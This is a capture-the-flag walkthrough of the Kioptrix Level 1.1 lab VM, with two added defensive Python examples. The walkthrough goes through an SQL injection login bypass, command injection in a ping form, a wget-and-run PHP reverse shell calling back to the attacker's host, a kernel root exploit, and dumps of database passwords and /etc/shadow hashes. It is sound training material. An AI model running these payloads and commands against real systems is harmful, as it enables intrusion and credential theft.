Kioptrix: Level 1.1 (#2) CTF VM WalkThrough

VM: Kioptrix: Level 1.1

Download link: https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar

Nmap scan:
 # Nmap 7.80 scan initiated Thu Apr 16 13:44:53 2020 as: nmap -A -oN nmap.scan 192.168.1.4
 Nmap scan report for 192.168.1.4
 Host is up (0.00042s latency).
 Not shown: 994 closed ports
 PORT     STATE SERVICE    VERSION
 22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
 | ssh-hostkey:
 |   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
 |   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
 |_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
 |_sshv1: Server supports SSHv1
 80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
 |_http-server-header: Apache/2.0.52 (CentOS)
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
 111/tcp  open  rpcbind    2 (RPC #100000)
 443/tcp  open  ssl/https?
 |_ssl-date: 2020-04-16T10:36:08+00:00; -3h09m42s from scanner time.
 | sslv2:
 |   SSLv2 supported
 |   ciphers:
 |     SSL2_RC4_128_EXPORT40_WITH_MD5
 |     SSL2_RC4_128_WITH_MD5
 |     SSL2_DES_64_CBC_WITH_MD5
 |     SSL2_DES_192_EDE3_CBC_WITH_MD5
 |     SSL2_RC2_128_CBC_WITH_MD5
 |     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
 |_    SSL2_RC4_64_WITH_MD5
 631/tcp  open  ipp        CUPS 1.1
 | http-methods:
 |_  Potentially risky methods: PUT
 |_http-server-header: CUPS/1.1
 |_http-title: 403 Forbidden
 3306/tcp open  mysql      MySQL (unauthorized)
 Device type: general purpose
 Running: Linux 2.6.X
 OS CPE: cpe:/o:linux:linux_kernel:2.6
 OS details: Linux 2.6.9 - 2.6.27
 Network Distance: 2 hops
 
 Host script results:
 |_clock-skew: -3h09m42s
 
 TRACEROUTE (using port 256/tcp)
 HOP RTT     ADDRESS
 1   0.05 ms 172.17.0.1
 2   0.32 ms 192.168.1.4
 
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 # Nmap done at Thu Apr 16 13:46:48 2020 -- 1 IP address (1 host up) scanned in 115.94 seconds
Open ports are:
 22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
 80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
 111/tcp  open  rpcbind    2 (RPC #100000)
 443/tcp  open  ssl/https?
 631/tcp  open  ipp        CUPS 1.1
 3306/tcp open  mysql      MySQL (unauthorized)
Port 80 is open and serves a web page with a login form.


There may be an SQL injection vulnerability. I tried to find SQL injection with sqlmap, but it did not find anything.
 $ sqlmap -u "http://192.168.1.4/index.php" --data="uname=admin&psw=12345&btnLogin=Login"
Testing manually with Burp Repeater, however, shows an SQL injection vulnerability in the `psw` field: putting `' or 1='1 --+` in the password field bypasses the login and loads another page that lets us ping any device on the network.


 192.168.1.10
 PING 192.168.1.10 (192.168.1.10) 56(84) bytes of data.
 64 bytes from 192.168.1.10: icmp_seq=0 ttl=64 time=55.5 ms
 64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=3.62 ms
 64 bytes from 192.168.1.10: icmp_seq=2 ttl=64 time=1.08 ms
 
 --- 192.168.1.10 ping statistics ---
 3 packets transmitted, 3 received, 0% packet loss, time 2002ms
 rtt min/avg/max/mdev = 1.087/20.070/55.501/25.074 ms, pipe 2
This functionality is a candidate for command injection: try to execute a command by appending it to the IP address
 ip_address;command
For example:
 192.168.1.10;ls
As expected, it returns the file names in the current directory.
 192.168.1.10;ls
 PING 192.168.1.10 (192.168.1.10) 56(84) bytes of data.
 64 bytes from 192.168.1.10: icmp_seq=0 ttl=64 time=54.0 ms
 64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=3.52 ms
 64 bytes from 192.168.1.10: icmp_seq=2 ttl=64 time=1.17 ms
 
 --- 192.168.1.10 ping statistics ---
 3 packets transmitted, 3 received, 0% packet loss, time 2001ms
 rtt min/avg/max/mdev = 1.175/19.587/54.059/24.394 ms, pipe 2
 index.php
 pingit.php
Another example:
 192.168.1.10;ls -al;pwd;whoami
 PING 192.168.1.10 (192.168.1.10) 56(84) bytes of data.
 64 bytes from 192.168.1.10: icmp_seq=0 ttl=64 time=57.1 ms
 64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=1.18 ms
 64 bytes from 192.168.1.10: icmp_seq=2 ttl=64 time=1.17 ms
 
 --- 192.168.1.10 ping statistics ---
 3 packets transmitted, 3 received, 0% packet loss, time 2001ms
 rtt min/avg/max/mdev = 1.173/19.832/57.144/26.383 ms, pipe 2
 total 24
 drwxr-xr-x  2 root root 4096 Oct  8  2009 .
 drwxr-xr-x  8 root root 4096 Oct  7  2009 ..
 -rwxr-Sr-t  1 root root 1733 Feb  9  2012 index.php
 -rwxr-Sr-t  1 root root  199 Oct  8  2009 pingit.php
 /var/www/html
 apache
The web server runs as user apache, the working directory is /var/www/html, and all the files are owned by root.
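Added example (Python, not the VM's pingit.php, whose source the walkthrough does not show): the defender's version of the ping handler. It accepts the target only if the whole input parses as a single IP address and then invokes ping with an argument list and no shell, so the `;`-separated commands shown above never reach a command interpreter. The sample inputs are constructed from the strings used in this section.

```python
import ipaddress
import subprocess
from typing import List, Optional, Tuple

# Constructed sample inputs: two legitimate addresses plus the injection
# strings from this section (assumed for the demo, not captured from the VM).
SAMPLE_INPUTS = [
    "192.168.1.10",
    "192.168.1.10;ls",
    "192.168.1.10;ls -al;pwd;whoami",
    "2001:db8::1",
    "10.0.0.1 && id",
    "localhost",
]


def validate_target(raw: str) -> Optional[str]:
    """Return the canonical text of the address if `raw` is exactly one IP
    address, otherwise None.  ipaddress.ip_address() rejects anything with
    shell metacharacters, whitespace, hostnames or trailing text, so there
    is nothing left for a shell to interpret."""
    try:
        return str(ipaddress.ip_address(raw.strip()))
    except ValueError:
        return None


def ping(target: str, count: int = 3, timeout: int = 10) -> subprocess.CompletedProcess:
    """Run ping without a shell: argv list, no string interpolation.  Even if
    validation were bypassed, a ';' would be part of one argument that ping
    itself rejects, not a command separator."""
    addr = validate_target(target)
    if addr is None:
        raise ValueError(f"not an IP address: {target!r}")
    return subprocess.run(
        ["ping", "-c", str(count), addr],
        capture_output=True, text=True, timeout=timeout, check=False,
    )


def classify(inputs: List[str]) -> Tuple[List[str], List[str]]:
    """Split inputs into (accepted, rejected), the way a reviewer would
    exercise the form before shipping it."""
    accepted, rejected = [], []
    for raw in inputs:
        (accepted if validate_target(raw) else rejected).append(raw)
    return accepted, rejected


if __name__ == "__main__":
    ok, bad = classify(SAMPLE_INPUTS)
    print("accepted:", ok)
    print("rejected:", bad)
```

The allow-list check does the real work; the argv-style `subprocess.run` is defence in depth for the day someone loosens the validator.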

Getting a remote shell:

We are going to use the PHP reverse shell from pentestmonkey.net: http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Download it from their page and change `$ip` and `$port` to your local system's address and listening port.
 set_time_limit (0);
 $VERSION = "1.0";
 $ip = '192.168.1.3';  // CHANGE THIS
 $port = 1234;       // CHANGE THIS
 $chunk_size = 1400;
 $write_a = null;
 $error_a = null;
 $shell = 'uname -a; w; id; /bin/sh -i';
 $daemon = 0;
 $debug = 0;
Now to upload this PHP file we use a series of commands. First start a server to host bd.php (I renamed the reverse shell file). We can use a simple Python server:
 python -m SimpleHTTPServer 8000
Commands to upload the file:
 cd /tmp                               # change directory to /tmp
 wget http://192.168.1.3:8000/bd.php   # download the backdoor file
 php -f bd.php                         # execute the file
Remember we can't download the file into the webroot directory, because it is owned by root and the ping command is executed by user apache. Before executing the commands, first start the listener on the local machine:
 $ nc -lvvp 1234
 Listening on [0.0.0.0] (family 0, port 1234)
Command:
 192.168.1.10;cd /tmp;wget http://192.168.1.3:8000/bd.php;php -f bd.php
After execution we get a reverse shell on the listener:
 $ nc -lvvp 1234
 Listening on [0.0.0.0] (family 0, port 1234)
 Connection from 192.168.1.4 45265 received!
 Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
  12:21:07 up  6:17,  0 users,  load average: 0.00, 0.00, 0.00
 USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=48(apache) gid=48(apache) groups=48(apache)
 sh: no job control in this shell
 sh-3.00$
 sh-3.00$ whoami
 apache
We now have a reverse shell as user apache.

Kernel Privilege Escalation:

Examining the OS and kernel version:
 sh-3.00# uname -a
 Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
 sh-3.00# cat /etc/*-release
 CentOS release 4.5 (Final)
A Google search for "kernel 2.6 exploit" gives an exploit for kernel versions 2.6.22 and below, found here: https://www.exploit-db.com/exploits/9542
 $ wget https://www.exploit-db.com/raw/9542
 $ mv 9542 peroot.c
Now download it onto the Kioptrix machine, compile it, and run it:
 sh-3.00$ cd /tmp
 sh-3.00$ wget http://192.168.1.3:8000/peroot.c
 sh-3.00$ gcc peroot.c -o peroot
 dirty.c:109:28: warning: no newline at end of file
 sh-3.00$ ./peroot
 sh-3.00# whoami
 root
It gives root access.

Examining Files:

Examining the PHP files in the webroot directory, we find the user 'john' and password 'hiroshima' hard-coded in the mysql_connect() call.
 sh-3.00# cd /var/www/html
 sh-3.00# ls
 index.php
 pingit.php
 sh-3.00# cat index.php
 <?php
     mysql_connect("localhost", "john", "hiroshima") or die(mysql_error());
     //print "Connected to MySQL<br />";
     mysql_select_db("webapp");
 
     if ($_POST['uname'] != ""){
         $username = $_POST['uname'];
         $password = $_POST['psw'];
         $query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";
         //print $query."<br>";
 ...
 ...
 ...
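Added example (Python with an in-memory SQLite table, not the VM's PHP): the query from index.php rebuilt by string interpolation beside the hardened form, so the effect of a quote in the `psw` field can be reproduced offline. The walkthrough's payload `' or 1='1 --+` succeeds against MySQL because MySQL converts the string to a number when comparing it with the integer 1; SQLite compares the types strictly, so the demo uses the type-neutral `' or '1'='1` form of the same tautology. The table layout and credentials are constructed for the demo.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed in-memory stand-in for the 'webapp' database.  'users' mirrors
# the walkthrough's plaintext (id, username, password) layout; 'users_hashed'
# is the hardened layout with a per-user salt and a PBKDF2 hash.
DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
DB.execute("CREATE TABLE users_hashed (id INTEGER, username TEXT, salt BLOB, pw_hash BLOB)")

# Constructed credentials, assumed for the demo (not the VM's).
DB.execute("INSERT INTO users VALUES (1, 'admin', 'CorrectHorse')")


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def add_user_hashed(uid: int, username: str, password: str) -> None:
    salt = os.urandom(16)
    DB.execute("INSERT INTO users_hashed VALUES (?, ?, ?, ?)",
               (uid, username, salt, _hash(password, salt)))


add_user_hashed(1, "admin", "CorrectHorse")


def login_vulnerable(username: str, password: str) -> bool:
    """Mirrors index.php: the SQL is assembled by string interpolation, so a
    quote in either field changes the statement the database parses."""
    query = ("SELECT * FROM users WHERE username = '%s' AND password='%s'"
             % (username, password))
    return DB.execute(query).fetchone() is not None


def login_safe(username: str, password: str) -> bool:
    """Hardened form: the username travels as a bound parameter (never parsed
    as SQL) and the password is verified by constant-time hash comparison in
    the application, so the submitted text cannot alter the WHERE clause."""
    row = DB.execute(
        "SELECT salt, pw_hash FROM users_hashed WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    salt, pw_hash = row
    return hmac.compare_digest(_hash(password, salt), pw_hash)


if __name__ == "__main__":
    payload = "' or '1'='1"
    print("vulnerable, tautology in psw:", login_vulnerable("admin", payload))
    print("safe, same input:            ", login_safe("admin", payload))
    print("safe, real password:         ", login_safe("admin", "CorrectHorse"))
```

The hardened query also fixes the second problem visible in the dump below: with hashes stored instead of plaintext, reading the `users` table no longer yields working login passwords.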
John's credentials don't work for SSH, but they do give access to the MySQL database. Now run some queries in MySQL:
 sh-3.00# mysql -u john -phiroshima -e 'show databases;'
 Database
 mysql
 test
 webapp
 sh-3.00# mysql -u john -phiroshima -e 'use webapp;show tables;'
 Tables_in_webapp
 users
 sh-3.00# mysql -u john -phiroshima -e 'use webapp;select * from users;'
 id username password
 1   admin   5afac8d85f
 2   john    66lajGGbla
Now at least we have the login passwords for the users of the index.php login page.

We can also look at the .mysql_history file for commands previously typed by users:
 show databases;
 create database webapp;
 use webapp;
 create table users(id INT,username varchar(100),password varchar(10));
 show database;
 select * from users;
 show databases;
 use webapp;
 insert into users values(1,'admin','hello');
 select * from users;
 use mysql
 show databases;
 use mysql;
 select * from users where user=john;
 show tables;
 select * from user where user=john;
 select * from user where user='john';
 select * from user;
 create user 'john'@'localhost' identified by 'hiroshima';
 create user 'webapp'@'localhost' identified by 'hiroshima';
 create user 'webapp'@'localhost' IDENTIFIED BY 'hiroshima';
 CREATE USER 'webapp'@'localhost' identified by 'hiroshima';
 update user set password = password('hiroshima') where user = 'john';
 use mysql;
 show users;
 select * from user;
 create user 'john'@'localhost' identified by 'hiroshima';
 version;
 -v
 ;
 help
 flush privileges;
 show databases;
 use mysql;
 grant select,insert,update,delete on *.* to 'john'@'localhost';
 update user set password = password('hiroshima') where user = 'john';
 flush priveleges;
 use webapp;
 show tables;
 update user set password = password('Ha56!blaKAbl') where user = 'admin';
 update username set password = password('Ha56!blaKAbl') where user = 'admin';
 select * from users;
 update username set password = password('Ha56!blaKAbl') where username = 'admin';
 update users set password = password('Ha56!blaKAbl') where username = 'admin';
 select * from users;
 insert into users values(2,'john','66lajGGbla');
 select * from users;
From the /etc/shadow file we get the password hashes for the users:
 root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:14529:0:99999:7:::
 john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:14525:0:99999:7:::
 harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:14529:0:99999:7:::